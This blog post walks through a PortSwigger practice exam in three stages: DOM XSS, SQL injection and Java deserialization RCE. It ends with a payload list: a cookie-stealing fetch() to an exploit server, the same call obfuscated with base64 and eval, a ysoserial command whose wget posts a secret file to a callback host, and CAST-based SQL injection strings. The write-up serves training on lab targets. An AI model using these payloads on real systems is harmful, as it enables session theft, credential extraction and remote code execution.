In this blog post, we’ll embark on a journey to dissect the solution to a challenging practice exam question provided by PortSwigger. We’ll delve deep into the intricacies of web security, emphasizing the critical importance of understanding vulnerabilities, exploitation techniques, and mitigation strategies. By the time you finish reading this article, you’ll have gained valuable insights into real-world web security scenarios, equipping yourself with the knowledge required to effectively protect digital assets.

Before we begin, let’s briefly introduce the PortSwigger practice exam. You can find more information about this exam here.

Here’s an overview of what the practice exam entails:

  • You have a two-hour window to complete the practice exam.
  • The exam involves exploiting a single vulnerable application.
  • The assessment is divided into three distinct stages:
    1. Finding the user
    2. Escalating privileges
    3. Achieving Remote Code Execution (RCE) or Command Execution

Now, let’s delve into the details of each stage, exploring the challenges and solutions that await:

First Stage: Finding the User

The first stage presents a dom-based Cross-Site Scripting (XSS) challenge. However, there are restrictions in place that require creative bypass techniques. We’ll walk you through the process of chaining payloads to successfully exploit the vulnerability and retrieve the user token.

XSS Challenge

The journey to finding the user token will involve a series of payload chains, as illustrated below:

Payload Chain

Payload Chain2

After numerous attempts and perseverance, you’ll achieve the desired outcome:

Exploit Success

Carlos token

Carlos Page

Second Stage: SQL Injection and Admin Login

The second stage may seem mundane but proves to be a critical test of your SQL injection skills. You’ll need to utilize CAST() clauses to extract the admin password.

To begin, you’ll want to confirm the presence of an SQL error when manipulating the ‘organize_by’ parameter:

SQL Error

With some persistence, you’ll uncover valuable information:

SQL Result

You’ll gather details such as the database version, user, and password:

DB Details

User and Password

Password

Admin Login

Delete user carlos :-)

Admin Login

Completing this stage, you’ll have accomplished two major milestones:

  1. Successful SQL injection
  2. Admin login credentials

Third Stage: Remote Code Execution via Deserialization

In the final stage, you’ll log in as the admin and inspect the cookies, specifically looking for a cookie named ‘admin’ with a known pattern ‘H4sIAAAAAAAAA.’ This pattern typically signifies a serialized Java string:

Payload Generation

To achieve Remote Code Execution (RCE) via deserialization, you’ll need a tool like ysoserial. Following the guidance provided in Hack Tricks, you’ll generate a payload.

Here’s a simplified example of a Java URLDNS payload:

Payload Generation

Upon successful payload execution, you’ll receive a callback:

Payload Result

Next, you’ll generate a payload to retrieve the contents of ‘/home/carlos/secret’:

Exploit Payload

And here’s the resulting data:

Exploit Payload Result

With this, you’ve achieved Remote Code Execution, completing the third stage and ultimately conquering the PortSwigger practice exam.

To further assist you in your web security endeavors, i’ve included some useful payload references and commands below:

fetch(`https://exploit-0ad000380440d0c28074023d010f00c1.exploit-server.net/exploit/?cookie=` + window["document"]["cookie"])

ZmV0Y2goYGh0dHBzOi8vZXhwbG9pdC0wYWQwMDAzODA0NDBkMGMyODA3NDAyM2QwMTBmMDBjMS5leHBsb2l0LXNlcnZlci5uZXQvZXhwbG9pdC8/Y29va2llPWAgKyB3aW5kb3dbImRvY3VtZW50Il1bImNvb2tpZSJdKQ==

"-eval(atob("ZmV0Y2goYGh0dHBzOi8vZXhwbG9pdC0wYWQwMDAzODA0NDBkMGMyODA3NDAyM2QwMTBmMDBjMS5leHBsb2l0LXNlcnZlci5uZXQvZXhwbG9pdC8/YCArIHdpbmRvd1siZG9jdW1lbnQiXVsiY29va2llIl0p"))-"

%22%2Deval%28atob%28%22ZmV0Y2goYGh0dHBzOi8vZXhwbG9pdC0wYWQwMDAzODA0NDBkMGMyODA3NDAyM2QwMTBmMDBjMS5leHBsb2l0LXNlcnZlci5uZXQvZXhwbG9pdC8%2FYCArIHdpbmRvd1siZG9jdW1lbnQiXVsiY29va2llIl0p%22%29%29%2D%22

<script>
location = "https://0a4a000a04b7d03c805f03c700b000a3.web-security-academy.net/?SearchTerm=%22%2Deval%28atob%28%22ZmV0Y2goYGh0dHBzOi8vZXhwbG9pdC0wYWQwMDAzODA0NDBkMGMyODA3NDAyM2QwMTBmMDBjMS5leHBsb2l0LXNlcnZlci5uZXQvZXhwbG9pdC8%2FYCArIHdpbmRvd1siZG9jdW1lbnQiXVsiY29va2llIl0p%22%29%29%2D%22"
</script>

# Example: Java URLDNS Payload
java -jar ysoserial-master-2 URLDNS https://t3x5wb0gfqrahx9rqg52p1s4zv5mthh6.oastify.com | gzip -f | base64 -w0

# Example: Common Utilities
java -jar ysoserial-master-2874a69f61-1.jar CommonsBeanutils1 'wget --post-file /home/carlos/secret t3x5wb0gfqrahx9rqg52p1s4zv5mthh6.oastify.com' | gzip -f | base64 -w0

# Example: SQL Injection Payloads
true+and+cast((select+version())as+boolean)
true+and+cast((select+username+from+users+limit+1)as+boolean)
true+and+cast((select+password+from+users+limit+1)as+boolean)